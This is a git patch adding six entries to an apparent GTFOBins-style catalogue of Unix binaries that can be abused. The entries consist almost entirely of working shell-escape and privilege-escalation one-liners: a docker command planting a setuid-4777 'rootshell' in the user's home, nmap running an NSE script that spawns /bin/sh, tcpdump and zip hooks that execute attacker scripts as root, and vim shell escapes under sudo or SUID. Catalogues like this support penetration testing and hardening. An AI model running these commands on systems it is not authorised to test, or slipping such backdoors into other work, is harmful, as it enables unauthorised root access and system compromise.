From 7219385a0528c897bdcf604e0fd6ede1700c0ff8 Mon Sep 17 00:00:00 2001 From: AlessandroZ Date: Fri, 17 Aug 2018 17:16:09 +0200 Subject: [PATCH] add new ways --- _gtfobins/docker.md | 7 +++++++ _gtfobins/nmap.md | 9 +++++++++ _gtfobins/rsync.md | 9 +++++++++ _gtfobins/tcpdump.md | 9 +++++++++ _gtfobins/vim.md | 19 +++++++++++++++++++ _gtfobins/zip.md | 11 +++++++++++ 6 files changed, 64 insertions(+) create mode 100644 _gtfobins/docker.md create mode 100644 _gtfobins/nmap.md create mode 100644 _gtfobins/rsync.md create mode 100644 _gtfobins/tcpdump.md create mode 100644 _gtfobins/vim.md create mode 100644 _gtfobins/zip.md diff --git a/_gtfobins/docker.md b/_gtfobins/docker.md new file mode 100644 index 0000000..1bc89b1 --- /dev/null +++ b/_gtfobins/docker.md @@ -0,0 +1,7 @@ +--- +functions: + execute-interactive: + - code: docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p + sudo-enabled: + - code: sudo docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p +--- diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md new file mode 100644 index 0000000..d3632f5 --- /dev/null +++ b/_gtfobins/nmap.md @@ -0,0 +1,9 @@ +--- +functions: + execute-non-interactive: + - code: echo "os.execute('/bin/sh')" > /tmp/script.nse + nmap --script=/tmp/script.nse + sudo-enabled: + - code: echo "os.execute('/bin/sh')" > /tmp/script.nse + sudo nmap --script=/tmp/script.nse +--- diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md new file mode 100644 index 0000000..79ff9e4 --- /dev/null +++ b/_gtfobins/rsync.md @@ -0,0 +1,9 @@ +--- +functions: + execute-non-interactive: + - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile + rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null + sudo-enabled: + - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile + sudo rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null +--- diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md new file mode 100644 index 0000000..5c2165e --- /dev/null +++ b/_gtfobins/tcpdump.md @@ -0,0 +1,9 @@ +--- +functions: + execute-non-interactive: + - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile + tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root + sudo-enabled: + - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile + sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root +--- diff --git a/_gtfobins/vim.md b/_gtfobins/vim.md new file mode 100644 index 0000000..fb45d0b --- /dev/null +++ b/_gtfobins/vim.md @@ -0,0 +1,19 @@ +--- +functions: + execute-interactive: + - code: vim -c ':!/bin/sh' + - code: | + vim + :set shell=/bin/sh + :shell + file-write: + - code: | + vim file_to_write + w + file-read: + - code: vim file_to_read + suid-enabled: + - code: ./vim -c ':!/bin/sh -p' + sudo-enabled: + - code: sudo vim -c ':!/bin/sh' +--- diff --git a/_gtfobins/zip.md b/_gtfobins/zip.md new file mode 100644 index 0000000..9d3864f --- /dev/null +++ b/_gtfobins/zip.md @@ -0,0 +1,11 @@ +--- +functions: + execute-interactive: + - code: echo "/bin/sh" > /tmp/run.sh + chmod +x /tmp/run.sh + zip z.zip * -T -TT /tmp/run.sh + sudo-enabled: + - code: echo "/bin/sh" > /tmp/run.sh + chmod +x /tmp/run.sh + sudo zip z.zip * -T -TT /tmp/run.sh +---